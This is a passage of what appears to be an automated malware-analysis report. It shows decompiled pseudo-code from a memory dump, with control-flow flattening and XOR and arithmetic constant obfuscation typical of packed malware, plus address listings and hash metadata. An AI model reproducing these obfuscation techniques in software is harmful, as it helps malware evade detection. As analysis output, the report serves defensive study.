                                                                                                                                                                                                                    				_t552 = 0x28;
                                                                                                                                                                                                                    				_v1624 = _v1624 / _t552;
                                                                                                                                                                                                                    				_v1624 = _v1624 ^ 0x000dbb2b;
                                                                                                                                                                                                                    				_v1632 = 0x219f44;
                                                                                                                                                                                                                    				_v1632 = _v1632 + 0x6a7c;
                                                                                                                                                                                                                    				_v1632 = _v1632 ^ 0x002ac436;
                                                                                                                                                                                                                    				_v1676 = 0x64cdec;
                                                                                                                                                                                                                    				_v1676 = _v1676 | 0xd2c3cc14;
                                                                                                                                                                                                                    				_v1676 = _v1676 * 0x58;
                                                                                                                                                                                                                    				_v1676 = _v1676 ^ 0x7fa6d1f4;
                                                                                                                                                                                                                    				_v1700 = 0xd19195;
                                                                                                                                                                                                                    				_v1700 = _v1700 + 0xffff3cd2;
                                                                                                                                                                                                                    				_v1700 = _v1700 + 0xffffedc6;
                                                                                                                                                                                                                    				_v1700 = _v1700 ^ 0x00d17704;
                                                                                                                                                                                                                    				_v1768 = 0x9beaf5;
                                                                                                                                                                                                                    				_v1768 = _v1768 + 0xdd10;
                                                                                                                                                                                                                    				_v1768 = _v1768 * 0x69;
                                                                                                                                                                                                                    				_v1768 = _v1768 >> 7;
                                                                                                                                                                                                                    				_v1768 = _v1768 ^ 0x00884c23;
                                                                                                                                                                                                                    				_v1776 = 0x19d7ff;
                                                                                                                                                                                                                    				_v1776 = _v1776 ^ 0x7a4b955b;
                                                                                                                                                                                                                    				_v1776 = _v1776 >> 2;
                                                                                                                                                                                                                    				_v1776 = _v1776 >> 8;
                                                                                                                                                                                                                    				_v1776 = _v1776 ^ 0x001320f5;
                                                                                                                                                                                                                    				_t602 = _v1596;
                                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                                    					L1:
                                                                                                                                                                                                                    					while(1) {
                                                                                                                                                                                                                    						L2:
                                                                                                                                                                                                                    						_t553 = 0x43e64b1;
                                                                                                                                                                                                                    						L3:
                                                                                                                                                                                                                    						while(_t604 != _t553) {
                                                                                                                                                                                                                    							if(_t604 == 0xa552d0b) {
                                                                                                                                                                                                                    								E00A6D804(_v1788, _v1756,  &_v1044, _t553, _v1796, _v1772);
                                                                                                                                                                                                                    								 *((short*)(E00A75011( &_v1044, _v1660, _v1764))) = 0;
                                                                                                                                                                                                                    								E00A6F1F6(_v1720,  &_v524, __eflags, _v1780, _v1688);
                                                                                                                                                                                                                    								_push(_v1696);
                                                                                                                                                                                                                    								_push(_v1812);
                                                                                                                                                                                                                    								_push(_v1600);
                                                                                                                                                                                                                    								E00A7E773(_v1680, __eflags,  &_v524, _v1712, 0xa612a4,  &_v1564, E00A81E60(0xa612a4, _v1672, __eflags),  &_v1044, _v1612);
                                                                                                                                                                                                                    								E00A7D6DF(_v1604, _t521, _v1732, _v1736);
                                                                                                                                                                                                                    								_t528 = E00A7C400(_t543, _v1724,  &_v1564, _v1616, _v1636);
                                                                                                                                                                                                                    								_t609 =  &(_t609[0x16]);
                                                                                                                                                                                                                    								__eflags = _t528;
                                                                                                                                                                                                                    								if(__eflags != 0) {
                                                                                                                                                                                                                    									_t529 = 0x6b1304e;
                                                                                                                                                                                                                    									__eflags = _t602 - 0x6b1304e;
                                                                                                                                                                                                                    									_t553 = 0x43e64b1;
                                                                                                                                                                                                                    									_t604 =  ==  ? 0x43e64b1 : 0xb254a4a;
                                                                                                                                                                                                                    									continue;
                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                    									_t604 = 0xba58672;
                                                                                                                                                                                                                    									while(1) {
                                                                                                                                                                                                                    										L1:
                                                                                                                                                                                                                    										L2:
                                                                                                                                                                                                                    										_t553 = 0x43e64b1;
                                                                                                                                                                                                                    										goto L3;
                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                    								L27:
                                                                                                                                                                                                                    								return _t537;
                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                    							if(_t604 == 0xafbdfd5) {
                                                                                                                                                                                                                    								_t533 = E00A7095F();
                                                                                                                                                                                                                    								__eflags = _t533 - E00A7C7A8(_t553);
                                                                                                                                                                                                                    								_t529 = 0x6b1304e;
                                                                                                                                                                                                                    								_t604 = 0xeae0dda;
                                                                                                                                                                                                                    								_t602 =  !=  ? 0x6b1304e : 0x5b58a;
                                                                                                                                                                                                                    								goto L2;
                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                    							if(_t604 == 0xb254a4a) {
                                                                                                                                                                                                                    								_push( &_v1564);
                                                                                                                                                                                                                    								_push( &_v1592);
                                                                                                                                                                                                                    								_push(0);
                                                                                                                                                                                                                    								_push(_v1692);
                                                                                                                                                                                                                    								_push(0);
                                                                                                                                                                                                                    								_push(_v1760);
                                                                                                                                                                                                                    								_push(_v1648);
                                                                                                                                                                                                                    								_t537 = E00A7E05C(_v1752, __eflags);
                                                                                                                                                                                                                    								__eflags = _t537;
                                                                                                                                                                                                                    								if(_t537 != 0) {
                                                                                                                                                                                                                    									E00A6E2BD(_v1592, _v1640, _v1684, _v1744);
                                                                                                                                                                                                                    									return E00A6E2BD(_v1588, _v1624, _v1632, _v1676);
                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                    								if(_t604 == 0xba58672) {
                                                                                                                                                                                                                    									return E00A6E2BD(_v1596, _v1700, _v1768, _v1776);
                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                    								if(_t604 == 0xce363e6) {
                                                                                                                                                                                                                    									_t604 = 0xafbdfd5;
                                                                                                                                                                                                                    									continue;
                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                    									if(_t604 != 0xeae0dda) {
                                                                                                                                                                                                                    										L22:
                                                                                                                                                                                                                    										__eflags = _t604 - 0x108ef91;
                                                                                                                                                                                                                    										if(__eflags != 0) {
                                                                                                                                                                                                                    											continue;
                                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                                    											return _t529;
                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                    										if(_t602 != _t529) {
                                                                                                                                                                                                                    											_t604 = 0xa552d0b;
                                                                                                                                                                                                                    											continue;
                                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                                    											_push(_v1716);
                                                                                                                                                                                                                    											_push(_v1704);
                                                                                                                                                                                                                    											_t537 = E00A6B0AC(_v1804,  &_v1596, _t553, _v1748, _t553);
                                                                                                                                                                                                                    											_t609 =  &(_t609[5]);
                                                                                                                                                                                                                    											if(_t537 != 0) {
                                                                                                                                                                                                                    												_t604 = 0xa552d0b;
                                                                                                                                                                                                                    												goto L1;
                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                    							goto L27;
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    						_push(_t553);
                                                                                                                                                                                                                    						_push(_t553);
                                                                                                                                                                                                                    						_t515 = E00A7EC30( &_v1564, _v1792, _v1596, _v1628,  &_v1592, _v1800, _v1808);
                                                                                                                                                                                                                    						_t609 =  &(_t609[8]);
                                                                                                                                                                                                                    						__eflags = _t515;
                                                                                                                                                                                                                    						if(_t515 != 0) {
                                                                                                                                                                                                                    							E00A6E2BD(_v1592, _v1708, _v1740, _v1668);
                                                                                                                                                                                                                    							E00A6E2BD(_v1588, _v1656, _v1784, _v1664);
                                                                                                                                                                                                                    							_t609 =  &(_t609[4]);
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    						_t604 = 0xba58672;
                                                                                                                                                                                                                    						_t553 = 0x43e64b1;
                                                                                                                                                                                                                    						goto L22;
                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                    			}




















































































                                                                                                                                                                                                                    0x00a75eca
                                                                                                                                                                                                                    0x00a75ed0
                                                                                                                                                                                                                    0x00a75eda
                                                                                                                                                                                                                    0x00a75ee2
                                                                                                                                                                                                                    0x00a75eed
                                                                                                                                                                                                                    0x00a75ef8
                                                                                                                                                                                                                    0x00a75f00
                                                                                                                                                                                                                    0x00a75f04
                                                                                                                                                                                                                    0x00a75f0c
                                                                                                                                                                                                                    0x00a75f14
                                                                                                                                                                                                                    0x00a75f1c
                                                                                                                                                                                                                    0x00a75f2e
                                                                                                                                                                                                                    0x00a75f30
                                                                                                                                                                                                                    0x00a75f35
                                                                                                                                                                                                                    0x00a75f3a
                                                                                                                                                                                                                    0x00a75f40
                                                                                                                                                                                                                    0x00a75f45
                                                                                                                                                                                                                    0x00a75f4d
                                                                                                                                                                                                                    0x00a75f58
                                                                                                                                                                                                                    0x00a75f60
                                                                                                                                                                                                                    0x00a75f6b
                                                                                                                                                                                                                    0x00a75f76
                                                                                                                                                                                                                    0x00a75f7e
                                                                                                                                                                                                                    0x00a75f89
                                                                                                                                                                                                                    0x00a75f91
                                                                                                                                                                                                                    0x00a75f99
                                                                                                                                                                                                                    0x00a75fa1
                                                                                                                                                                                                                    0x00a75fa9
                                                                                                                                                                                                                    0x00a75fb1
                                                                                                                                                                                                                    0x00a75fbc
                                                                                                                                                                                                                    0x00a75fc4
                                                                                                                                                                                                                    0x00a75fcf
                                                                                                                                                                                                                    0x00a75fda
                                                                                                                                                                                                                    0x00a75fe2
                                                                                                                                                                                                                    0x00a75fea
                                                                                                                                                                                                                    0x00a75ff2
                                                                                                                                                                                                                    0x00a75ffa
                                                                                                                                                                                                                    0x00a76002
                                                                                                                                                                                                                    0x00a7600c
                                                                                                                                                                                                                    0x00a7600d
                                                                                                                                                                                                                    0x00a76011
                                                                                                                                                                                                                    0x00a76019
                                                                                                                                                                                                                    0x00a76021
                                                                                                                                                                                                                    0x00a76029
                                                                                                                                                                                                                    0x00a76031
                                                                                                                                                                                                                    0x00a7603f
                                                                                                                                                                                                                    0x00a76043
                                                                                                                                                                                                                    0x00a7604b
                                                                                                                                                                                                                    0x00a76053
                                                                                                                                                                                                                    0x00a76060
                                                                                                                                                                                                                    0x00a76064
                                                                                                                                                                                                                    0x00a76069
                                                                                                                                                                                                                    0x00a76071
                                                                                                                                                                                                                    0x00a7607e
                                                                                                                                                                                                                    0x00a76082
                                                                                                                                                                                                                    0x00a7608a
                                                                                                                                                                                                                    0x00a76092
                                                                                                                                                                                                                    0x00a7609a
                                                                                                                                                                                                                    0x00a760a5
                                                                                                                                                                                                                    0x00a760b0
                                                                                                                                                                                                                    0x00a760bb
                                                                                                                                                                                                                    0x00a760c3
                                                                                                                                                                                                                    0x00a760c8
                                                                                                                                                                                                                    0x00a760cd
                                                                                                                                                                                                                    0x00a760d5
                                                                                                                                                                                                                    0x00a760dd
                                                                                                                                                                                                                    0x00a760ed
                                                                                                                                                                                                                    0x00a760f2
                                                                                                                                                                                                                    0x00a760f8
                                                                                                                                                                                                                    0x00a76100
                                                                                                                                                                                                                    0x00a76108
                                                                                                                                                                                                                    0x00a76110
                                                                                                                                                                                                                    0x00a7611d
                                                                                                                                                                                                                    0x00a7611e
                                                                                                                                                                                                                    0x00a76122
                                                                                                                                                                                                                    0x00a76127
                                                                                                                                                                                                                    0x00a7612f
                                                                                                                                                                                                                    0x00a7613a
                                                                                                                                                                                                                    0x00a76145
                                                                                                                                                                                                                    0x00a76150
                                                                                                                                                                                                                    0x00a7615b
                                                                                                                                                                                                                    0x00a76166
                                                                                                                                                                                                                    0x00a7616e
                                                                                                                                                                                                                    0x00a76179
                                                                                                                                                                                                                    0x00a76184
                                                                                                                                                                                                                    0x00a7618c
                                                                                                                                                                                                                    0x00a76197
                                                                                                                                                                                                                    0x00a7619f
                                                                                                                                                                                                                    0x00a761a7
                                                                                                                                                                                                                    0x00a761ac
                                                                                                                                                                                                                    0x00a761b1
                                                                                                                                                                                                                    0x00a761b9
                                                                                                                                                                                                                    0x00a761c4
                                                                                                                                                                                                                    0x00a761cf
                                                                                                                                                                                                                    0x00a761da
                                                                                                                                                                                                                    0x00a761e5
                                                                                                                                                                                                                    0x00a761f0
                                                                                                                                                                                                                    0x00a761f8
                                                                                                                                                                                                                    0x00a76203
                                                                                                                                                                                                                    0x00a7620e
                                                                                                                                                                                                                    0x00a76219
                                                                                                                                                                                                                    0x00a76224
                                                                                                                                                                                                                    0x00a7622f
                                                                                                                                                                                                                    0x00a76237
                                                                                                                                                                                                                    0x00a7623c
                                                                                                                                                                                                                    0x00a76244
                                                                                                                                                                                                                    0x00a7624c
                                                                                                                                                                                                                    0x00a7625f
                                                                                                                                                                                                                    0x00a76266
                                                                                                                                                                                                                    0x00a76271
                                                                                                                                                                                                                    0x00a76284
                                                                                                                                                                                                                    0x00a7628b
                                                                                                                                                                                                                    0x00a76296
                                                                                                                                                                                                                    0x00a7629e
                                                                                                                                                                                                                    0x00a762ac
                                                                                                                                                                                                                    0x00a762b0
                                                                                                                                                                                                                    0x00a762b8
                                                                                                                                                                                                                    0x00a762c5
                                                                                                                                                                                                                    0x00a762c9
                                                                                                                                                                                                                    0x00a762ce
                                                                                                                                                                                                                    0x00a762d6
                                                                                                                                                                                                                    0x00a762de
                                                                                                                                                                                                                    0x00a762e3
                                                                                                                                                                                                                    0x00a762eb
                                                                                                                                                                                                                    0x00a762f3
                                                                                                                                                                                                                    0x00a762fe
                                                                                                                                                                                                                    0x00a76306
                                                                                                                                                                                                                    0x00a76311
                                                                                                                                                                                                                    0x00a7631c
                                                                                                                                                                                                                    0x00a76324
                                                                                                                                                                                                                    0x00a7632f
                                                                                                                                                                                                                    0x00a7633a
                                                                                                                                                                                                                    0x00a76345
                                                                                                                                                                                                                    0x00a76350
                                                                                                                                                                                                                    0x00a76358
                                                                                                                                                                                                                    0x00a7635d
                                                                                                                                                                                                                    0x00a76365
                                                                                                                                                                                                                    0x00a7636f
                                                                                                                                                                                                                    0x00a7637a
                                                                                                                                                                                                                    0x00a76385
                                                                                                                                                                                                                    0x00a76390
                                                                                                                                                                                                                    0x00a76398
                                                                                                                                                                                                                    0x00a763a0
                                                                                                                                                                                                                    0x00a763a8
                                                                                                                                                                                                                    0x00a763ad
                                                                                                                                                                                                                    0x00a763b5
                                                                                                                                                                                                                    0x00a763bd
                                                                                                                                                                                                                    0x00a763c5
                                                                                                                                                                                                                    0x00a763ca
                                                                                                                                                                                                                    0x00a763cf
                                                                                                                                                                                                                    0x00a763d7
                                                                                                                                                                                                                    0x00a763df
                                                                                                                                                                                                                    0x00a763e7
                                                                                                                                                                                                                    0x00a763ef
                                                                                                                                                                                                                    0x00a763f7
                                                                                                                                                                                                                    0x00a763ff
                                                                                                                                                                                                                    0x00a76407
                                                                                                                                                                                                                    0x00a7640c
                                                                                                                                                                                                                    0x00a76414
                                                                                                                                                                                                                    0x00a76428
                                                                                                                                                                                                                    0x00a7642d
                                                                                                                                                                                                                    0x00a76436
                                                                                                                                                                                                                    0x00a76441
                                                                                                                                                                                                                    0x00a76454
                                                                                                                                                                                                                    0x00a76457
                                                                                                                                                                                                                    0x00a7645e
                                                                                                                                                                                                                    0x00a76469
                                                                                                                                                                                                                    0x00a76471
                                                                                                                                                                                                                    0x00a76479
                                                                                                                                                                                                                    0x00a76481
                                                                                                                                                                                                                    0x00a76486
                                                                                                                                                                                                                    0x00a7648e
                                                                                                                                                                                                                    0x00a76499
                                                                                                                                                                                                                    0x00a764a1
                                                                                                                                                                                                                    0x00a764ac
                                                                                                                                                                                                                    0x00a764b4
                                                                                                                                                                                                                    0x00a764c1
                                                                                                                                                                                                                    0x00a764c5
                                                                                                                                                                                                                    0x00a764cd
                                                                                                                                                                                                                    0x00a764d5
                                                                                                                                                                                                                    0x00a764e0
                                                                                                                                                                                                                    0x00a764eb
                                                                                                                                                                                                                    0x00a764f6
                                                                                                                                                                                                                    0x00a764fe
                                                                                                                                                                                                                    0x00a76503
                                                                                                                                                                                                                    0x00a7650b
                                                                                                                                                                                                                    0x00a76510
                                                                                                                                                                                                                    0x00a76518
                                                                                                                                                                                                                    0x00a76523
                                                                                                                                                                                                                    0x00a7652b
                                                                                                                                                                                                                    0x00a76536
                                                                                                                                                                                                                    0x00a76541
                                                                                                                                                                                                                    0x00a76554
                                                                                                                                                                                                                    0x00a76555
                                                                                                                                                                                                                    0x00a7655c
                                                                                                                                                                                                                    0x00a76567
                                                                                                                                                                                                                    0x00a7657b
                                                                                                                                                                                                                    0x00a76582
                                                                                                                                                                                                                    0x00a76589
                                                                                                                                                                                                                    0x00a76594
                                                                                                                                                                                                                    0x00a7659c
                                                                                                                                                                                                                    0x00a765a4
                                                                                                                                                                                                                    0x00a765ac
                                                                                                                                                                                                                    0x00a765b4
                                                                                                                                                                                                                    0x00a765be
                                                                                                                                                                                                                    0x00a765d7
                                                                                                                                                                                                                    0x00a765da
                                                                                                                                                                                                                    0x00a765e1
                                                                                                                                                                                                                    0x00a765ec
                                                                                                                                                                                                                    0x00a765f7
                                                                                                                                                                                                                    0x00a76602
                                                                                                                                                                                                                    0x00a7660d
                                                                                                                                                                                                                    0x00a76618
                                                                                                                                                                                                                    0x00a7662b
                                                                                                                                                                                                                    0x00a76632
                                                                                                                                                                                                                    0x00a7663d
                                                                                                                                                                                                                    0x00a76648
                                                                                                                                                                                                                    0x00a76653
                                                                                                                                                                                                                    0x00a7665e
                                                                                                                                                                                                                    0x00a76669
                                                                                                                                                                                                                    0x00a76671
                                                                                                                                                                                                                    0x00a7667e
                                                                                                                                                                                                                    0x00a76682
                                                                                                                                                                                                                    0x00a76687
                                                                                                                                                                                                                    0x00a7668f
                                                                                                                                                                                                                    0x00a76697
                                                                                                                                                                                                                    0x00a7669f
                                                                                                                                                                                                                    0x00a766a4
                                                                                                                                                                                                                    0x00a766a9
                                                                                                                                                                                                                    0x00a766b1
                                                                                                                                                                                                                    0x00a766b8
                                                                                                                                                                                                                    0x00a766b8
                                                                                                                                                                                                                    0x00a766bd
                                                                                                                                                                                                                    0x00a766bd
                                                                                                                                                                                                                    0x00a766bd
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a766c2
                                                                                                                                                                                                                    0x00a766cc
                                                                                                                                                                                                                    0x00a7679b
                                                                                                                                                                                                                    0x00a767c3
                                                                                                                                                                                                                    0x00a767d5
                                                                                                                                                                                                                    0x00a767da
                                                                                                                                                                                                                    0x00a767e6
                                                                                                                                                                                                                    0x00a767ea
                                                                                                                                                                                                                    0x00a76838
                                                                                                                                                                                                                    0x00a76851
                                                                                                                                                                                                                    0x00a76872
                                                                                                                                                                                                                    0x00a76877
                                                                                                                                                                                                                    0x00a7687a
                                                                                                                                                                                                                    0x00a7687c
                                                                                                                                                                                                                    0x00a76888
                                                                                                                                                                                                                    0x00a76892
                                                                                                                                                                                                                    0x00a76894
                                                                                                                                                                                                                    0x00a76899
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a7687e
                                                                                                                                                                                                                    0x00a7687e
                                                                                                                                                                                                                    0x00a766b8
                                                                                                                                                                                                                    0x00a766b8
                                                                                                                                                                                                                    0x00a766bd
                                                                                                                                                                                                                    0x00a766bd
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a766bd
                                                                                                                                                                                                                    0x00a766b8
                                                                                                                                                                                                                    0x00a769df
                                                                                                                                                                                                                    0x00a769df
                                                                                                                                                                                                                    0x00a769df
                                                                                                                                                                                                                    0x00a766d8
                                                                                                                                                                                                                    0x00a7675d
                                                                                                                                                                                                                    0x00a76769
                                                                                                                                                                                                                    0x00a76770
                                                                                                                                                                                                                    0x00a76775
                                                                                                                                                                                                                    0x00a7677a
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a7677a
                                                                                                                                                                                                                    0x00a766e0
                                                                                                                                                                                                                    0x00a76964
                                                                                                                                                                                                                    0x00a7696c
                                                                                                                                                                                                                    0x00a7696d
                                                                                                                                                                                                                    0x00a7696f
                                                                                                                                                                                                                    0x00a76976
                                                                                                                                                                                                                    0x00a76978
                                                                                                                                                                                                                    0x00a7697c
                                                                                                                                                                                                                    0x00a76987
                                                                                                                                                                                                                    0x00a7698f
                                                                                                                                                                                                                    0x00a76991
                                                                                                                                                                                                                    0x00a769ac
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a769d2
                                                                                                                                                                                                                    0x00a766e6
                                                                                                                                                                                                                    0x00a766ec
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a7695a
                                                                                                                                                                                                                    0x00a766f8
                                                                                                                                                                                                                    0x00a76741
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a766fa
                                                                                                                                                                                                                    0x00a76700
                                                                                                                                                                                                                    0x00a7692d
                                                                                                                                                                                                                    0x00a7692d
                                                                                                                                                                                                                    0x00a76933
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a76706
                                                                                                                                                                                                                    0x00a76708
                                                                                                                                                                                                                    0x00a7673d
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a7670a
                                                                                                                                                                                                                    0x00a7670a
                                                                                                                                                                                                                    0x00a76715
                                                                                                                                                                                                                    0x00a76726
                                                                                                                                                                                                                    0x00a7672b
                                                                                                                                                                                                                    0x00a76730
                                                                                                                                                                                                                    0x00a76736
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a76736
                                                                                                                                                                                                                    0x00a76730
                                                                                                                                                                                                                    0x00a76708
                                                                                                                                                                                                                    0x00a76700
                                                                                                                                                                                                                    0x00a766f8
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a766e0
                                                                                                                                                                                                                    0x00a768a1
                                                                                                                                                                                                                    0x00a768a2
                                                                                                                                                                                                                    0x00a768d3
                                                                                                                                                                                                                    0x00a768d8
                                                                                                                                                                                                                    0x00a768db
                                                                                                                                                                                                                    0x00a768dd
                                                                                                                                                                                                                    0x00a768f8
                                                                                                                                                                                                                    0x00a76916
                                                                                                                                                                                                                    0x00a7691b
                                                                                                                                                                                                                    0x00a7691b
                                                                                                                                                                                                                    0x00a7691e
                                                                                                                                                                                                                    0x00a76928
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a76928
                                                                                                                                                                                                                    0x00a766bd

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.845522080.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: -:8$=@$W'bC$a"$p$|j
                                                                                                                                                                                                                    • API String ID: 0-3455963370
                                                                                                                                                                                                                    • Opcode ID: a09692041fbfc64abd58cc0def0c35e451581dde2b374455a091da6e1ec65a6a
                                                                                                                                                                                                                    • Instruction ID: 40a91274d52be50de2b5ed8983c4e2312019fe7a893829c8a98a59a4642e8465
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a09692041fbfc64abd58cc0def0c35e451581dde2b374455a091da6e1ec65a6a
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A84211715083819FD7B8CF64C98AB8BBBE1BBC0748F50891DE5DA96260D7B48948CF53
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    C-Code - Quality: 90%
                                                                                                                                                                                                                    			E00A78103(void* __edx, intOrPtr _a4) {
                                                                                                                                                                                                                    				char _v520;
                                                                                                                                                                                                                    				char _v1040;
                                                                                                                                                                                                                    				char _v1560;
                                                                                                                                                                                                                    				intOrPtr _v1564;
                                                                                                                                                                                                                    				intOrPtr _v1568;
                                                                                                                                                                                                                    				intOrPtr _v1572;
                                                                                                                                                                                                                    				signed int _v1576;
                                                                                                                                                                                                                    				signed int _v1580;
                                                                                                                                                                                                                    				signed int _v1584;
                                                                                                                                                                                                                    				signed int _v1588;
                                                                                                                                                                                                                    				signed int _v1592;
                                                                                                                                                                                                                    				signed int _v1596;
                                                                                                                                                                                                                    				signed int _v1600;
                                                                                                                                                                                                                    				signed int _v1604;
                                                                                                                                                                                                                    				signed int _v1608;
                                                                                                                                                                                                                    				signed int _v1612;
                                                                                                                                                                                                                    				signed int _v1616;
                                                                                                                                                                                                                    				signed int _v1620;
                                                                                                                                                                                                                    				signed int _v1624;
                                                                                                                                                                                                                    				signed int _v1628;
                                                                                                                                                                                                                    				signed int _v1632;
                                                                                                                                                                                                                    				signed int _v1636;
                                                                                                                                                                                                                    				signed int _v1640;
                                                                                                                                                                                                                    				signed int _v1644;
                                                                                                                                                                                                                    				signed int _v1648;
                                                                                                                                                                                                                    				signed int _v1652;
                                                                                                                                                                                                                    				signed int _v1656;
                                                                                                                                                                                                                    				signed int _v1660;
                                                                                                                                                                                                                    				signed int _v1664;
                                                                                                                                                                                                                    				signed int _v1668;
                                                                                                                                                                                                                    				signed int _v1672;
                                                                                                                                                                                                                    				signed int _v1676;
                                                                                                                                                                                                                    				signed int _v1680;
                                                                                                                                                                                                                    				signed int _v1684;
                                                                                                                                                                                                                    				signed int _v1688;
                                                                                                                                                                                                                    				signed int _v1692;
                                                                                                                                                                                                                    				signed int _v1696;
                                                                                                                                                                                                                    				signed int _v1700;
                                                                                                                                                                                                                    				signed int _v1704;
                                                                                                                                                                                                                    				signed int _v1708;
                                                                                                                                                                                                                    				signed int _v1712;
                                                                                                                                                                                                                    				void* _t370;
                                                                                                                                                                                                                    				void* _t408;
                                                                                                                                                                                                                    				void* _t409;
                                                                                                                                                                                                                    				void* _t420;
                                                                                                                                                                                                                    				signed int _t430;
                                                                                                                                                                                                                    				void* _t432;
                                                                                                                                                                                                                    				intOrPtr _t477;
                                                                                                                                                                                                                    				signed int _t478;
                                                                                                                                                                                                                    				signed int _t479;
                                                                                                                                                                                                                    				signed int _t480;
                                                                                                                                                                                                                    				signed int _t481;
                                                                                                                                                                                                                    				signed int _t482;
                                                                                                                                                                                                                    				signed int _t483;
                                                                                                                                                                                                                    				signed int _t484;
                                                                                                                                                                                                                    				signed int _t485;
                                                                                                                                                                                                                    				signed int _t486;
                                                                                                                                                                                                                    				signed int* _t491;
                                                                                                                                                                                                                    
                                                                                                                                                                                                                    				_push(_a4);
                                                                                                                                                                                                                    				_push(__edx);
                                                                                                                                                                                                                    				_push(0);
                                                                                                                                                                                                                    				E00A7C6D8(_t370);
                                                                                                                                                                                                                    				_v1572 = 0xb38874;
                                                                                                                                                                                                                    				_t491 =  &(( &_v1712)[3]);
                                                                                                                                                                                                                    				_v1568 = 0x9e301b;
                                                                                                                                                                                                                    				_v1564 = 0;
                                                                                                                                                                                                                    				_t432 = 0x8fde3bb;
                                                                                                                                                                                                                    				_v1660 = 0x8eea72;
                                                                                                                                                                                                                    				_t477 = 0;
                                                                                                                                                                                                                    				_t478 = 0x77;
                                                                                                                                                                                                                    				_v1660 = _v1660 / _t478;
                                                                                                                                                                                                                    				_v1660 = _v1660 + 0xbef6;
                                                                                                                                                                                                                    				_v1660 = _v1660 >> 0xe;
                                                                                                                                                                                                                    				_v1660 = _v1660 ^ 0x0000002e;
                                                                                                                                                                                                                    				_v1712 = 0x9bf666;
                                                                                                                                                                                                                    				_v1712 = _v1712 << 0xc;
                                                                                                                                                                                                                    				_v1712 = _v1712 | 0xe4078e64;
                                                                                                                                                                                                                    				_v1712 = _v1712 + 0xffff45aa;
                                                                                                                                                                                                                    				_v1712 = _v1712 ^ 0xff698e25;
                                                                                                                                                                                                                    				_v1624 = 0xf73c5e;
                                                                                                                                                                                                                    				_t430 = 0x60;
                                                                                                                                                                                                                    				_v1624 = _v1624 / _t430;
                                                                                                                                                                                                                    				_t479 = 0xe;
                                                                                                                                                                                                                    				_v1624 = _v1624 * 0x3b;
                                                                                                                                                                                                                    				_v1624 = _v1624 ^ 0x0098d23f;
                                                                                                                                                                                                                    				_v1676 = 0xb656aa;
                                                                                                                                                                                                                    				_v1676 = _v1676 >> 0xd;
                                                                                                                                                                                                                    				_v1676 = _v1676 | 0x8ab03212;
                                                                                                                                                                                                                    				_v1676 = _v1676 * 0x3d;
                                                                                                                                                                                                                    				_v1676 = _v1676 ^ 0x0bf95366;
                                                                                                                                                                                                                    				_v1600 = 0xa9e53e;
                                                                                                                                                                                                                    				_v1600 = _v1600 | 0x7a986ef1;
                                                                                                                                                                                                                    				_v1600 = _v1600 >> 0xe;
                                                                                                                                                                                                                    				_v1600 = _v1600 ^ 0x00068220;
                                                                                                                                                                                                                    				_v1700 = 0x4dfa5e;
                                                                                                                                                                                                                    				_v1700 = _v1700 << 9;
                                                                                                                                                                                                                    				_v1700 = _v1700 << 0x10;
                                                                                                                                                                                                                    				_v1700 = _v1700 / _t479;
                                                                                                                                                                                                                    				_v1700 = _v1700 ^ 0x0d62c6dc;
                                                                                                                                                                                                                    				_v1644 = 0xdd60e1;
                                                                                                                                                                                                                    				_v1644 = _v1644 + 0xbf17;
                                                                                                                                                                                                                    				_v1644 = _v1644 ^ 0x017b616a;
                                                                                                                                                                                                                    				_t480 = 0x22;
                                                                                                                                                                                                                    				_v1644 = _v1644 * 0x5b;
                                                                                                                                                                                                                    				_v1644 = _v1644 ^ 0x95d23255;
                                                                                                                                                                                                                    				_v1708 = 0xe5b99a;
                                                                                                                                                                                                                    				_v1708 = _v1708 >> 3;
                                                                                                                                                                                                                    				_v1708 = _v1708 / _t480;
                                                                                                                                                                                                                    				_v1708 = _v1708 | 0xa455c838;
                                                                                                                                                                                                                    				_v1708 = _v1708 ^ 0xa4566abe;
                                                                                                                                                                                                                    				_v1636 = 0xd9fc3e;
                                                                                                                                                                                                                    				_v1636 = _v1636 >> 0xf;
